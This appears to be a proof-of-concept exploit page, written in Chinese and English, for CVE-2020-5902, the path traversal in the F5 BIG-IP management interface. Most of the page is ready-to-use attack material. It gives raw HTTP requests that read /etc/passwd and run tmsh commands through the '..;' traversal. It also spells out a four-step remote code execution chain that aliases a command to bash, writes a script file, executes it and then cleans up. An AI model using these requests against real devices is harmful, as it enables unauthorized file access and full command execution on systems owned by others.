CVE-2020-5902 PoC — F5 BIG-IP 路径遍历漏洞

Source

Associated Vulnerability

Readme

# CVE-2020-5902_RCE_EXP

Blog：[http://www.svenbeast.com/post/cve-2020-5902](http://www.svenbeast.com/post/cve-2020-5902-big-ip-rce-rao-guo-tmsh-xian-zhi-ming-ling-zhi-xing-andexp-bian/)

![](./rce1.png)

### Read File

Example: https://x.x.x.x/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Cookie: JSESSIONID=89E562018185E75966F67E7FC50CF6E1
```
![](./ReadFile.png)


### F5 RCE

Example: https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user

```
GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Cookie: JSESSIONID=07E7975B5F6F4B43F3375AA5FFB32628
```
![](./list.png)

### RCE
* 1. 修改alias ，将list设置成bash命令
```
htts://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
```
* 2. 生成bash文件并写入要执行的命令
```
htts://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content=whoami
```
* 3. 执行bash文件
```
htts://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe
```
* 4. 还原alias设置，防止影响目标正常使用
```
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
```
![](./result.png)

### 参考链接

https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4

https://github.com/jas502n/CVE-2020-5902

File Snapshot

 [4.0K]  /data/pocs/b32745155a96bd716f6f5a90e70784ab5f1867d6
├── [2.4K]  CVE-2020-5902_RCE.py
├── [358K]  list.png
├── [239K]  rce1.png
├── [526K]  ReadFile.png
├── [2.6K]  README.md
└── [196K]  result.png

0 directories, 6 files

Remarks